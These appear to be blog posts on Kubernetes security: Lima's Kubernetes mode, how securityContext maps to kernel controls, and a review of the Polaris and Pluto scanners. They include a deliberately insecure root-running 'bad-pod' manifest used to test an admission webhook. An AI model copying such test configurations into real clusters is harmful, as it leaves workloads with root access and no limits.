Lima also has a Kubernetes mode. This is real Kubernetes, but it’s optimized for speed and convenience. Not as much use for teaching cluster operations or mimicking production environments.

Start a Kubernetes-enabled Lima instance with default settings.

matt.brown@matt ~ % limactl start --name lima-k8s template://k8s
WARN[0000] Template locator "template://k8s" should be written "template:k8s" since Lima v2.0
? Creating an instance "lima-k8s" Proceed with the current configuration
...
Downloading the image (ubuntu-24.04-server-cloudimg-arm64.img)
592.12 MiB / 592.12 MiB [----------------------------------] 100.00% 19.40 MiB/s
INFO[0036] Downloaded the image from "https://cloud-images.ubuntu.com/releases/noble/release-20251213/ubuntu-24.04-server-cloudimg-arm64.img"
INFO[0039] Attempting to download the nerdctl archive    arch=aarch64 digest="sha256:2c4b97312acd41c4dfe80db6e82592367b3862b5db4c51ce67a6d79bf6ee00ee" location="https://github.com/containerd/nerdctl/releases/download/v2.2.1/nerdctl-full-2.2.1-linux-arm64.tar.gz"
...
INFO[0292] Message from the instance "lima-k8s":
To run `kubectl` on the host (assumes kubectl is installed), run the following commands:
------
export KUBECONFIG="/Users/matt.brown/.lima/lima-k8s/copied-from-guest/kubeconfig.yaml"
kubectl ...
------

So let's just run kubectl from our local machine after exporting.

matt.brown@matt ~ % export KUBECONFIG="/Users/matt.brown/.lima/lima-k8s/copied-from-guest/kubeconfig.yaml"
matt.brown@matt ~ % kubectl get po
No resources found in default namespace.

Cool it is up and running.

Deploy something trivial and expose it.

matt.brown@matt ~ % kubectl create deployment hello --image=nginx
deployment.apps/hello created
matt.brown@matt ~ % kubectl get po
NAME                     READY   STATUS    RESTARTS   AGE
hello-775d79c56b-jrnk5   1/1     Running   0          8s
matt.brown@matt ~ % kubectl expose deployment hello --type=NodePort --port=80
service/hello exposed

Then let's grab the NodePort.

matt.brown@matt ~ % kubectl get svc
NAME         TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)        AGE
hello        NodePort    10.97.172.133           80:31866/TCP   3s
kubernetes   ClusterIP   10.96.0.1               443/TCP        7m

From your Mac, open a browser and hit:

http://localhost:31866 #or your NodePort

That’s enough to prove the point. You have a working Kubernetes API, a running workload, and a cluster you didn’t have to assemble by hand.

This setup is well-suited for:

API exploration
RBAC experiments
Admission and policy testing

It’s not a replacement for a production-shaped cluster, but we know that.

Wrap Up

In a single tool, we went from a clean Linux VM to a running process, a container, and a Kubernetes deployment. There was nothing complicated and thankfully no MiniKube.

That’s the point of Lima. There’s a lot more you can do here: custom images, multi-VM setups, deeper Kubernetes tuning. I might visit that in the future.

But for learning, testing, and fast iteration, this is where I wanted to land.

Kubernetes securityContext

Matt Brown — Thu, 22 Jan 2026 04:09:51 GMT

Kubernetes has a talent I don’t: making hard problems feel solved the moment you put them in YAML.

securityContext is the best example.

Most people talk about it like it’s a “Kubernetes security feature.” It’s not. Kubernetes doesn’t enforce the things you set here. It passes intent to the container runtime, which then asks the Linux kernel to apply controls like:

syscall filtering (seccomp)
privilege scoping (capabilities)
mandatory access rules (LSMs like AppArmor)
identity defaults (UID/GID and group settings)

That’s a contractual boundary, not a guarantee of outcome.

This post exists because we tend to do one of two things:

ignore securityContext entirely, then act surprised when a pod behaves exactly like a pod
sprinkle a few fields into YAML and declare it “hardened”

We’ll walk through what securityContext actually represents, why pod-level versus container-level scope matters, and where Kubernetes stops caring. This isn’t a copy-paste guide; it’s the mental model.

Along the way, we’ll anchor the discussion to topics already covered, including our old friends like Linux capabilities. These serve as reference points rather than detours.

Orientation Diagram: The `securityContext` Contract

Keep this diagram in mind. Everything in this post maps back to where enforcement actually happens: the kernel.

What `securityContext` Is (and Is Not)

At its core, securityContext is an interface, not a security engine. Kubernetes does not implement seccomp. It does not enforce Linux capabilities. It does not mediate LSM decisions. What it does is collect intent from the workload spec and hand that intent to the container runtime at process start. From that point on, Kubernetes is out of the loop.

That distinction matters because it defines the limits of what Kubernetes can guarantee:

Kubernetes can validate that your YAML is well-formed
Kubernetes can ensure the runtime receives your intent
Kubernetes cannot confirm that the kernel actually enforced it

If a seccomp profile is missing, an AppArmor profile is not loaded, or a kernel feature is disabled, Kubernetes does not block the pod from starting. As far as the API server is concerned, its job is done. This is not a bug. Kubernetes is a scheduler and orchestration system. Host security enforcement happens elsewhere. securityContext is the handshake between those worlds.

Pod-Level vs Container-Level `securityContext`

One of the easiest ways to misunderstand securityContext is to miss where it applies. Kubernetes allows securityContext to be defined at both the pod level and the container level, and those scopes behave very differently.

Pod-Level `securityContext`

A pod-level securityContext defines defaults for every container in the pod.

This is where you can see:

default user and group IDs
filesystem group ownership
a default seccomp profile

These settings establish a baseline posture for the pod as a whole. If nothing else is specified, every container inherits them.

At this point you could say the pod is secure, but that assumption only holds if nothing overrides it.

Container-Level `securityContext`

Container-level securityContext applies to individual processes.

This is where you control:

Linux capabilities
privilege escalation behavior
privileged mode
container-specific user overrides

Container-level settings are authoritative. They can narrow the pod’s posture, but also weaken it. A pod can declare a reasonable default at the top level while a single container opts out of meaningful restrictions. Kubernetes allows this because pods are composition units, not trust boundaries.

The practical takeaway is simple:

Pod-level securityContext expresses intent.
Container-level securityContext determines behavior.

Where This Becomes Relevant

This pod-versus-container split is why:

admission policies might validate both scopes
scanners flag container-level exceptions even when pod defaults look fine
runtime tools frequently surface behavior that “shouldn’t have been allowed”

Mapping `securityContext` to Kernel Enforcement (What Actually Happens)

Before looking at behavior and failure modes, it helps to be explicit about what knobs actually exist and where they land.

Kubernetes exposes a relatively small securityContext surface area. Each field maps to a specific kernel mechanism.

I suggest reading the API docs to supplement. Pod Security Context and Container Security Context.

`securityContext` Fields and Kernel Mapping

securityContext Field	Scope	Kernel Mechanism	What the Kernel Enforces
`allowPrivilegeEscalation`	Container	no_new_privs	Whether exec can gain new privileges
`appArmorProfile`	Pod / Container	LSM	Resource access decisions
`capabilities.add` / `capabilities.drop`	Container	Linux capabilities	Which privileged operations may succeed
`fsGroup`	Pod	GID (filesystem)	File ownership and write permissions
`fsGroupChangePolicy`	Pod	Filesystem ownership change	Controls when volume ownership and permissions are modified before mount
`privileged`	Container	Multiple	Disables several isolation controls
`procMount`	Container	Multiple	Disables several isolation controls
`readOnlyRootFilesystem`	Container	VFS permissions	Filesystem write restrictions
`runAsGroup`	Pod / Container	GID	Process primary group
`runAsNonRoot`	Pod / Container	UID Check	Prevents process from running as UID 0
`runAsUser`	Pod / Container	UID	Process user identity
`seLinuxChangePolicy`	Pod	SELinux labeling (filesystem)	Controls how SELinux labels are applied to pod volumes
`seLinuxOptions`	Pod / Container	LSM	Resource access decisions
`seccompProfile`	Pod / Container	seccomp (BPF)	Which syscalls may execute
`supplementalGroups`	Pod	Groups	Additional group access
`supplementalGroupsPolicy`	Pod	Group resolution (UID/GID)	Controls how supplemental groups are calculated for container processes
`sysctls`	Pod	Kernel sysctl (namespaced)	Sets kernel parameters for the pod
`windowsOptions`	Pod / Container	Various	Additional options via Windows `SecurityContext`

What This Looks Like at Runtime

To make this concrete, consider a container with a securityContext that:

runs as a non-root user
drops most Linux capabilities
disables privilege escalation
uses the default seccomp profile

This is the kind of configuration many teams consider a reasonable baseline.

When the container starts, the runtime translates this configuration into kernel state before any application code runs.

First, the kernel assigns the process its UID, GID, and group set. At that point, the process is no longer “a container.” It is just a Linux process with an identity. If the application expected to run as root, that assumption is already broken.

Next, the kernel applies the capability set. Any operation that relies on a dropped capability fails at the kernel permission check, not in Kubernetes.

With privilege escalation disabled, the kernel also prevents the process from gaining additional privileges across exec boundaries. Even if a binary is misconfigured or marked setuid, the process cannot elevate itself later.

Then the seccomp filter is loaded. Seccomp does not wait for suspicious behavior. It defines which syscalls are allowed to execute at all. If the process attempts a disallowed syscall, the kernel intervenes immediately.

By the time the application starts executing logic, the kernel has already decided:

the process runs as a non-root user
most privileged operations will fail due to dropped capabilities
the process cannot gain additional privileges through execution
only the syscalls allowed by the default seccomp profile may execute

From Kubernetes’ point of view, the pod is simply running. From the kernel’s point of view, the rules are already fixed.

This is why securityContext matters and is so easy to misunderstand.

Proving the Contract: Let’s Actually Run This

Up to this point, we’ve talked about intent, enforcement, and kernel behavior in the abstract. Now let’s stop theorizing and actually run something. The goal here isn’t to harden a production workload or enumerate every syscall. It’s to take a simple, representative securityContext, deploy it, and then observe what the kernel enforces in practice.

Here’s the pod.

apiVersion: v1
kind: Pod
metadata:
  name: securitycontext-proof
spec:
  securityContext:
    runAsNonRoot: true
    seccompProfile:
      type: RuntimeDefault
  containers:
  - name: demo
    image: nginxinc/nginx-unprivileged
    command: ["sh", "-c", "sleep 3600"]
    securityContext:
      allowPrivilegeEscalation: false
      capabilities:
        drop:
          - ALL

This is intentionally boring.

In the sections that follow, we’ll look at what’s actually running on the node and how each part of this configuration shows up as a concrete, enforceable decision by the kernel.

What This Looks Like on a Real Node

At this point, nothing here is abstract anymore. The configuration has been applied, the process is running, and the kernel has already made its decisions. Now let’s look at what’s actually running on the node.

Resolve the Container PID on the Host

These commands bridge Kubernetes to the host kernel.

matt@cp:~/sec-context$ CID=$(kubectl get pod securitycontext-proof -o jsonpath='{.status.containerStatuses[0].containerID}' | sed 's|containerd://||')
PID=$(sudo crictl inspect $CID | jq -r .info.pid)
echo "Container PID on host: $PID"
WARN[0000] Config "/etc/crictl.yaml" does not exist, trying next: "/usr/bin/crictl.yaml"
WARN[0000] runtime connect using default endpoints: [unix:///run/containerd/containerd.sock unix:///run/crio/crio.sock unix:///var/run/cri-dockerd.sock]. As the default settings are now deprecated, you should set the endpoint instead.
WARN[0000] Image connect using default endpoints: [unix:///run/containerd/containerd.sock unix:///run/crio/crio.sock unix:///var/run/cri-dockerd.sock]. As the default settings are now deprecated, you should set the endpoint instead.
Container PID on host: 77587

Process Identity

Validate that the process is running as a non-root user.

matt@cp:~/sec-context$ ps -o pid,uid,gid,cmd -p "$PID"
    PID   UID   GID CMD
  77587   101   101 sh -c sleep 3600

Expected:

UID != 0
GID != 0
Command matches the container entrypoint

Capabilities

Inspect the effective capability set applied by the kernel.

matt@cp:~/sec-context$ sudo grep Cap /proc/$PID/status
CapInh:    0000000000000000
CapPrm:    0000000000000000
CapEff:    0000000000000000
CapBnd:    0000000000000000
CapAmb:    0000000000000000

Key field:

CapEff should be all zeros, indicating no effective capabilities.

Optional decode for readability:

matt@cp:~/sec-context$ sudo capsh --decode=$(awk '/CapEff/ {print $2}' /proc/$PID/status)
0x0000000000000000=

Privilege Escalation (`no_new_privs`)

Confirm that privilege escalation is disabled at the kernel level.

matt@cp:~/sec-context$ grep NoNewPrivs /proc/$PID/status
NoNewPrivs:    1

Seccomp

Check that a seccomp filter is active.

matt@cp:~/sec-context$ grep Seccomp /proc/$PID/status
Seccomp:    2
Seccomp_filters:    1

Putting it Together

Taken together, these checks show that the running process:

has a non-root UID and GID
has no effective Linux capabilities
cannot gain privileges after startup
is constrained by a seccomp syscall filter

At this point, the workload is no longer "a pod with a securityContext." It is a Linux process with a fixed identity, privilege set, and syscall surface.

Kubernetes expressed intent earlier. The kernel is now enforcing the contract.

Wrap Up

securityContext does not secure a workload by itself. It defines the contract that the kernel will enforce. When that contract aligns with how an application actually behaves, it removes entire classes of risk.

When it doesn’t, the result is often surprising behavior, failed startups, or outright crashes. Those crashes are not Kubernetes being fragile. They are the kernel enforcing constraints that were previously absent or misaligned. Understanding why that happens is a topic worth its own deep dive.

For now, the key takeaway is simple:

Kubernetes expresses intent
the runtime translates it
the kernel enforces it

Everything else exists to make sure that contract is intentional, consistent, and observable.

CloudSec Burrito 2.0

Matt Brown — Fri, 16 Jan 2026 04:33:15 GMT

Over the last year (actually 8 months), I managed to publish 23 posts on this blog. It meant a lot of long days, numerous lab rebuilds, half-finished markdown litter, and more time than I care to admit staring at Kubernetes YAML wondering why something that definitely should have worked… didn’t.

Then things slowed down. December showed up. Life outside of Kubernetes continued to exist. The blog stalled a bit. Ideas did not dry up, but the process didn’t scale. Every post felt like a full production, which made consistency harder than it needed to be.

That’s what CloudSec Burrito 2.0 is about. Not writing more. Writing more intentionally.

Part of that reset is tooling and structure. I’ve moved planning and drafting from .md files scattered everywhere into Notion, as a way to enforce consistency:

Reusable post templates
Clear sections and framing
A bias toward diagrams and concrete artifacts
Less reinvention, more iteration

Same topics. Same hands-on approach. Better assembly.

What Changes in Burrito 2.0

Burrito 2.0 is about repeatable structure, not one-off essays.

Each post aims to ship at least one concrete artifact:

A diagram that anchors the idea
A runnable or inspectable example
A decision or evaluation framework
A mental model you can reuse later

And just as important:

Not every post needs to be a full sit-down meal.

You’ll see more short-form posts alongside deeper dives:

One diagram with commentary
One focused lab note or gotcha
One clarification that saves you rereading a 2,000-word post

Think fewer overstuffed burritos, more intentionally built tacos in between.

A Concrete Example: “How Do You Actually Access a Kubernetes Cluster?”

Let’s pick on one post on K8s RBAC that I like. Which makes it a good candidate to highlight improvement.

It opens with a familiar lab reality:

You’ve got a Kubernetes cluster running locally. You SSH to a node, run kubectl, and you’re in.

From there, it walks through:

SSH access to a node
kubeconfig and client certificates
Kubernetes authentication vs authorization
RBAC, ClusterRoles, and bindings
Service accounts and default tokens
The full auth → RBAC chain

Technically: solid.
Educationally: useful.
Structurally: this is where Burrito 2.0 shows its value.

How This Post Could Have Been Better (Burrito 2.0 Lens)

1. It Needed an Early Diagram

The post explains the access chain well, but only after a lot of text.

A simple diagram near the top would anchor everything that follows and give readers a mental model before diving into mechanics.

2. The “Who Am I?” Question Came Too Late

A strong idea in the article is this contrast:

Linux knows who I am.
Kubernetes often does not know the human behind the request.

That question is the hook. In Burrito 2.0, it belongs up front, not halfway down the page.

3. It Mixed “Learning” and “Operating” Without Calling It Out

The post teaches:

How Kubernetes access works
Why the default approach is risky in practice

Both are valuable, but the transition between them wasn’t explicit.

What Burrito 2.0 Optimizes For

Using that post as a reference point, Burrito 2.0 emphasizes:

Diagrams early to anchor complex flows
Clear framing questions at the start
Explicit transitions from how it works to why it matters
Shorter, focused follow-ups instead of one massive brain dump

Better layering.

Embedded Diagram Example (Mermaid)

One of the concrete changes in Burrito 2.0 is pushing diagrams earlier in the post to anchor the discussion. Instead of discovering the flow halfway through a wall of text, the idea is to make the access path explicit up front.

This diagram shows the full chain from a human on a laptop to effective permissions inside the cluster. Using my new favorite language, Mermaid!

flowchart TB
    H["Human"] -- ssh --> N["Node shell"]
    N -- kubectl --> K["kubeconfig (current context)"]
    K --> C["Credential (client cert / token)"]
    C --> APIS["API Server"]
    APIS --> ID["User + Groups (derived identity)"]
    ID --> RBAC["RBAC (roles & bindings in etcd)"]
    RBAC --> PERM["Effective permissions"]
    APIS -- audit (if enabled) --> AUD["Audit log entries"]

And the payoff.

Wrap Up

CloudSec Burrito 2.0 isn’t about a new direction. It’s about a better process.

Same tortilla. Better layers. More Chipotle level wrapping.

And yes, this might be a cheat post, but it counts in my book.

Kubernetes Posture Made Simple With Polaris

Matt Brown — Wed, 26 Nov 2025 21:16:27 GMT

Kubernetes has slim pickings when it comes to open source “posture tools.” We’ve already looked at kube-bench, which is not terrible. So, still wandering the landscape in search of the Holy Grail, we’re now turning to Fairwinds Polaris.

Polaris tries to cover three angles:

A dashboard that shows you workload posture issues (nothing groundbreaking, but workable)
An admission controller that can… well, do admission controller things
A CLI/CI scanner that flags obvious problems before you unleash them on a cluster

The dashboard is… fine. Polished enough, just not particularly inspired. The checks behind it are solid, and the fact that you get dashboard + AC + pipeline scanning in one lightweight package is, objectively, something. It’s worth noting that Polaris mixes in a fair number of non-security checks as well, which we’ll take a look at.

But here’s the honest tl;dr: Polaris is useful, but it’s not exactly the kind of tool you rearrange your security stack for. The juice isn't quite worth the squeeze. Still, it's worth a look, if only to confirm that feeling.

Installing Polaris

Polaris ships as a Helm chart, and the install process is easy. If all you care about is seeing the dashboard and getting a quick read on your workload posture, this is the simplest path.

1. Add the Fairwinds repo

helm repo add fairwinds-stable https://charts.fairwinds.com/stable
helm repo update

2. Construct a values file

This is one of the nicer parts of Polaris: with just a few settings you can get a clean NodePort service for the dashboard and a safely scoped admission controller. The webhook runs in Fail mode and only for namespaces labeled with ac-land, which we’ll set up later for testing.

Save the following as values.yaml:

dashboard:
  service:
    type: NodePort

webhook:
  enable: true
  validate: true
  mutate: false
  failurePolicy: Fail
  namespaceSelector:
    matchExpressions:
    - key: ac-land
      operator: Exists

3. Install Polaris (dashboard and admission control enabled)

helm upgrade --install polaris fairwinds-stable/polaris --namespace polaris --create-namespace -f values.yaml

This gives you the Deployment, Service, RBAC, and all the usual Helm chart trimmings.

4. Accessing the Dashboard

Grab the IP address via the NodePort service we now have.

matt@cp:~/fairwinds/polaris$ kubectl get svc -n polaris
NAME                TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)        AGE
polaris-dashboard   NodePort    10.97.42.83             80:32423/TCP   5m46s
polaris-webhook     ClusterIP   10.104.102.78           443/TCP        41m

Now you can hit:

http://:32423 #or whatever your NodePort is

Success, your dashboard is now running.

Dashboard Walkthrough

Let’s start with the annoying part: when you open the Polaris dashboard, the very first thing you see is a giant header linking out to all things Fairwinds/Polaris. And yes — there’s what looks like an embedded ad. Which, for extra spice, leads to a 404. Not a great first impression, but I digress.

Here’s what the dashboard actually gives you:

Overview

This section shows:

IP address
Overall grade
A donut chart breaking down Passing, Warning, and Dangerous checks

None of this is clickable.
The grade is the most interesting (and the most confusing) part — but we’ll get into that later.

Insights

This appears to be the same information as the Overview, just in a slightly different layout.
There’s no new detail, no navigation, no drill-down.
Not sure what purpose this panel serves beyond filling space.

Namespaces / Cluster Resources

This is the part that actually works:

You get a list of cluster-wide resources
Below that, a list of resources grouped by namespace
Clicking either lets you expand and see which checks passed or failed

You can also filter by namespace, which updates the Overview to show posture for only that slice of the cluster — probably the most genuinely useful interaction in the entire dashboard.

For each individual check, you’ll find a tiny “info” icon, but it just links you back to the generic Polaris docs again. No contextual explanation, no specific guidance.

TL;DR

The dashboard is functional, but limited. It's useful in small doses, but not something you’ll rely on day‑to‑day.

Understanding the Grade

The grade is the most interesting and confusing part of the Polaris dashboard. This is all about checks.

This is where I'll pretend like I'm a data scientist. But hey I did take statistics once upon a time.

You get three numbers:

Passing — checks you passed
Warning — checks that aren’t ideal, but not catastrophic (I am guessing)
Dangerous — checks that are actually bad

You’ll also see a little note under the score explaining that Warnings get half the weight of dangerous checks. Sounds simple enough…:

score = Passing / (Passing + Dangerous + 0.5 * Warning)

Why this is confusing

Warnings are being scaled down (only counting as half a “bad” check)… but Passing is not being scaled in any way to match that weighting.

In other words:

Dangerous checks hurt you at full weight
Warnings hurt you at half weight
Passing checks always count as full credit, even though warnings are being down-weighted in the denominator.

So you’re no longer looking at “percentage of checks passed,” or anything intuitive like that. Instead, you’re looking at a weighted penalty score, where warnings only count as half a failure, but never count as half a success.

Why I don’t get it…

If warnings are meant to be “half bad,” logically they should also be “half good.” Not doing this creates a mismatch:

The total checks you see (e.g., 826)
≠
The denominator used for grading (which shrinks warnings to 0.5)

The end result is a grade that sort of looks like a percentage…

A Quick Example

Let’s use simple round numbers so we can see the problem clearly.

Imagine Polaris reports:

Passing: 700
Warning: 76
Dangerous: 50
Total checks: 826

At first glance, you might think the grade is something like:
“700 out of 826 checks passed.”

But that’s not what Polaris calculates.

What Polaris Actually Calculates

Using their formula:

score = 700 / (700 + 50 + 0.5 * 76)

Compute the denominator:

Passing = 700
Dangerous = 50
Half the Warnings = 38

denominator = 700 + 50 + 38 = 788

So the Polaris score becomes:

score = 700 / 788 ≈ 0.89

This isn’t “89% of checks passed.” It’s “passing divided by a weighted count of badness.” That’s why the number feels disconnected from what you see in my opinion.

Ok enough of the data science.

Testing the Admission Controller

Seriously, another admission controller?

With Polaris using our safe values file, it’s time to actually test the admission controller and see what it catches. The webhook is running in Ignore mode and scoped to a single namespace, which gives us a safe sandbox to experiment in without risking the cluster.

Create the test namespace

kubectl create namespace ac-land
kubectl label namespace ac-land ac-land=true

Everything we apply here should be intercepted by the Polaris webhook.

Deploy a “known bad” workload

Let’s start with something obviously wrong. This one has no resource limits, running as root, missing probes, the usual Kubernetes crimes:

apiVersion: v1
kind: Pod
metadata:
  name: bad-pod
  namespace: ac-land
spec:
  containers:
  - name: app
    image: nginx:latest
    securityContext:
      runAsUser: 0
    resources:
      requests: {}
      limits: {}

Because we’re running with:

failurePolicy: Fail

The pod will not be created because it fails some "Dangerous" checks like "Image tag should be specified." In action we see the following:

matt@cp:~/fairwinds/polaris$ kubectl apply -f bad-pod.yaml
Error from server (Forbidden): error when creating "bad-pod.yaml": admission webhook "polaris.fairwinds.com" denied the request:
Polaris prevented this deployment due to configuration problems:
- Container app: Image tag should be specified
- Container app: Should not be allowed to run as root
- Container app: Privilege escalation should not be allowed

Check what Polaris actually saw

Look at the webhook logs:

matt@cp:~/fairwinds/polaris$ kubectl logs -n polaris -l component=webhook
    >      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/certwatcher/certwatcher.go:139 +0x2e8
    >  sigs.k8s.io/controller-runtime/pkg/webhook.(*DefaultServer).Start.func1()
    >      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/webhook/server.go:214 +0x28
    >  created by sigs.k8s.io/controller-runtime/pkg/webhook.(*DefaultServer).Start in goroutine 66
    >      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/webhook/server.go:213 +0x28c
time="2025-11-26T19:47:32Z" level=info msg="Starting admission request"
time="2025-11-26T19:47:32Z" level=info msg="Object bad-pod has no owner - running checks"
time="2025-11-26T19:47:32Z" level=warning msg="no ResourceProvider available, check automountServiceAccountToken will not work in this context (e.g. admission control)"
time="2025-11-26T19:47:32Z" level=warning msg="no ResourceProvider available, check missingNetworkPolicy will not work in this context (e.g. admission control)"
time="2025-11-26T19:47:32Z" level=info msg="3 validation errors found when validating bad-pod"
    >      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/certwatcher/certwatcher.go:139 +0x2e8
    >  sigs.k8s.io/controller-runtime/pkg/webhook.(*DefaultServer).Start.func1()
    >      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/webhook/server.go:214 +0x28
    >  created by sigs.k8s.io/controller-runtime/pkg/webhook.(*DefaultServer).Start in goroutine 43
    >      /go/pkg/mod/sigs.k8s.io/controller-runtime@v0.21.0/pkg/webhook/server.go:213 +0x28c
time="2025-11-26T19:15:16Z" level=info msg="Starting admission request"
time="2025-11-26T19:15:16Z" level=info msg="Object bad-pod has no owner - running checks"
time="2025-11-26T19:15:16Z" level=warning msg="no ResourceProvider available, check automountServiceAccountToken will not work in this context (e.g. admission control)"
time="2025-11-26T19:15:16Z" level=warning msg="no ResourceProvider available, check missingNetworkPolicy will not work in this context (e.g. admission control)"
time="2025-11-26T19:15:16Z" level=info msg="3 validation errors found when validating bad-pod"

Polaris gives you some useful information, but it’s presented in a pretty strange way. You’ll see a mix of errors, partial details about which validations failed, and a few items that look like failures but are really just warnings. The webhook logs themselves aren’t exactly pleasant. They’re noisy, inconsistent, and don’t meaningfully explain what Polaris actually decided.

And the dashboard? As far as I can tell, none of this admission activity shows up there at all.

Non-Security Checks: Efficiency & Reliability

Polaris isn’t just about security; it also ships with a wide set of efficiency and reliability checks. These aren’t going to stop an attacker, but they do help catch the everyday “why is this Deployment so fragile?” issues.

These include things like:

Missing CPU or memory requests
Missing CPU or memory limits
Liveness/readiness probes not defined
Using the latest tag
Pods without disruption budgets

These show up in the dashboard under the Efficiency and Reliability categories. The grouping is a bit high-level, but clicking into a Deployment or Pod gives you the full list of checks, their severity, and Polaris' recommendation.

While these aren’t “security” checks per se, they’re useful guardrails for teams that want basic hygiene without pulling in a more complex policy engine. Just don’t expect deep insight.

Customizing Polaris Checks

Polaris ships with a large default ruleset, but not all of it will make sense for you! Fortunately, you can tune or disable checks using a simple configuration file.

Example `config.yaml`

checks:
  cpuRequestsMissing: warning
  cpuLimitsMissing: ignore
  readinessProbeMissing: danger
  livenessProbeMissing: warning
  tagNotSpecified: ignore

Applying It

helm upgrade --install polaris fairwinds-stable/polaris   -n polaris   -f values.yaml   --set-file config=config.yaml

Customizing checks helps reduce noise and lets Polaris fit your environment instead of the other way around. Not such a bad thing, I guess.

Polaris in CLI & CI

Polaris can be used as a CLI or CI scanner. This is the mode where its checks are surfaced cleanly and without the noise of dashboards or webhooks.

CLI Scan Example

First install via brew locally.

brew tap FairwindsOps/tap
brew install FairwindsOps/tap/polaris

Then run against the bad-pod.yaml file from earlier.

matt.brown@matt Polaris % polaris audit --audit-path . --format=pretty
Polaris audited Path . at 2025-11-26T12:15:52-08:00
    Nodes: 0 | Namespaces: 0 | Controllers: 1
    Final score: 48

Pod bad-pod in namespace ac-land
    metadataAndInstanceMismatched        😬 Warning
        Reliability - Label app.kubernetes.io/instance must match metadata.name
    hostNetworkSet                       🎉 Success
        Security - Host network is not configured
    hostPIDSet                           🎉 Success
        Security - Host PID is not configured
    hostPathSet                          🎉 Success
        Security - HostPath volumes are not configured
    hostProcess                          🎉 Success
        Security - Privileged access to the host check is valid
    missingNetworkPolicy                 😬 Warning
        Security - A NetworkPolicy should match pod labels and contain applied egress and ingress rules
    priorityClassNotSet                  😬 Warning
        Reliability - Priority class should be set
    procMount                            🎉 Success
        Security - The default /proc masks are set up to reduce attack surface, and should be required
    topologySpreadConstraint             😬 Warning
        Reliability - Pod should be configured with a valid topology spread constraint
    automountServiceAccountToken         😬 Warning
        Security - The ServiceAccount will be automounted
    hostIPCSet                           🎉 Success
        Security - Host IPC is not configured
  Container app
    sensitiveContainerEnvVar             🎉 Success
        Security - The container does not set potentially sensitive environment variables
    tagNotSpecified                      ❌ Danger
        Reliability - Image tag should be specified
    hostPortSet                          🎉 Success
        Security - Host port is not configured
    linuxHardening                       😬 Warning
        Security - Use one of AppArmor, Seccomp, SELinux, or dropping Linux Capabilities to restrict containers using unwanted privileges
    pullPolicyNotAlways                  😬 Warning
        Reliability - Image pull policy should be "Always"
    insecureCapabilities                 😬 Warning
        Security - Container should not have insecure capabilities
    memoryRequestsMissing                😬 Warning
        Efficiency - Memory requests should be set
    privilegeEscalationAllowed           ❌ Danger
        Security - Privilege escalation should not be allowed
    cpuLimitsMissing                     😬 Warning
        Efficiency - CPU limits should be set
    dangerousCapabilities                🎉 Success
        Security - Container does not have any dangerous capabilities
    livenessProbeMissing                 😬 Warning
        Reliability - Liveness probe should be configured
    memoryLimitsMissing                  😬 Warning
        Efficiency - Memory limits should be set
    notReadOnlyRootFilesystem            😬 Warning
        Security - Filesystem should be read only
    readinessProbeMissing                😬 Warning
        Reliability - Readiness probe should be configured
    runAsPrivileged                      🎉 Success
        Security - Not running as privileged
    runAsRootAllowed                     ❌ Danger
        Security - Should not be allowed to run as root
    cpuRequestsMissing                   😬 Warning
        Efficiency - CPU requests should be set

Polaris acts like a lightweight linter for Kubernetes YAML. It's fast, easy to plug in, and gives clear feedback on both security and reliability issues before anything ever hits version control or your cluster. Nice touch with the emojis, at least.

Bonus: A Quick Look at Pluto (Outdated API Checker)

Pluto is a companion Fairwinds tool that identifies deprecated or soon‑to‑be‑removed Kubernetes API versions. It’s perfect for catching upcoming breakage before your next cluster upgrade.

Install Pluto on Linux (ARM64)

# 1. Download the ARM64 binary
wget https://github.com/FairwindsOps/pluto/releases/download/v5.22.6/pluto_5.22.6_linux_arm64.tar.gz

# 2. Extract the archive
tar -xvf pluto_5.22.6_linux_arm64.tar.gz

# 3. Make it executable
chmod +x pluto

# 4. Verify
./pluto version

You should see something like:

Version:5.22.6 Commit:27a470e10b07302fba2d5a2e6817a08a2b87c0c3

Test Pluto Using a Deprecated API (FlowSchema v1beta3)

Save this as fc.yaml:

apiVersion: flowcontrol.apiserver.k8s.io/v1beta3
kind: FlowSchema
metadata:
  name: deprecated-flowschema
spec:
  priorityLevelConfiguration:
    name: workload-high
  matchingPrecedence: 1000
  distinguisherMethod:
    type: ByUser
  rules:
  - subjects:
    - kind: User
      user:
        name: system:serviceaccount:default:default
    resourceRules:
    - verbs: ["*"]
      apiGroups: ["*"]
      resources: ["*"]
    nonResourceRules:
    - verbs: ["*"]
      nonResourceURLs: ["*"]

Against the file you’ll see a deprecation warning.

matt@cp:~/fairwinds/polaris$ ./pluto detect-files -f fc.yaml
NAME                    KIND         VERSION                                REPLACEMENT                       REMOVED   DEPRECATED   REPL AVAIL
deprecated-flowschema   FlowSchema   flowcontrol.apiserver.k8s.io/v1beta3   flowcontrol.apiserver.k8s.io/v1   false     true         false

Pluto in your running cluster

Pluto can also be run against your live cluster. While this is useful for older cluster versions, against a 1.33 cluster you shouldn't see anything.

matt@cp:~/fairwinds/polaris$ kubectl version
Client Version: v1.33.6
Kustomize Version: v5.6.0
Server Version: v1.33.6
matt@cp:~/fairwinds/polaris$ ./pluto detect-all-in-cluster -o wide 2>/dev/null
There were no resources found with known deprecated apiVersions.

Wrap Up

If you’ve made it this far, I commend you. Writing this post felt a bit like sitting five minutes into a panel interview and realizing this isn’t the right candidate, but you still push through out of courtesy.

Polaris is a lightweight posture tool that offers a very surface-level read on workload quality. The dashboard looks fine but doesn’t tell you much, the admission controller functions but provides almost no visibility, and the CLI has pockets of usefulness if you really need a YAML linter with opinions. Furthermore, there isn't really a clear standard it is being evaluated against. Is this compliance, best practice, or something else?

But the reality is simple: there isn’t much here that provides meaningful or lasting value. It’s not deep, it’s not insightful, and it’s not something I’d recommend beyond casual curiosity.

Bubble Wrap for Containers

Matt Brown — Sun, 23 Nov 2025 21:14:00 GMT

Kubernetes makes it easy to forget what’s really running underneath. You write a Deployment, set a few limits, and let the control plane take it from there. But once that Pod lands on a node, it’s no longer YAML — it’s syscalls hitting the kernel.

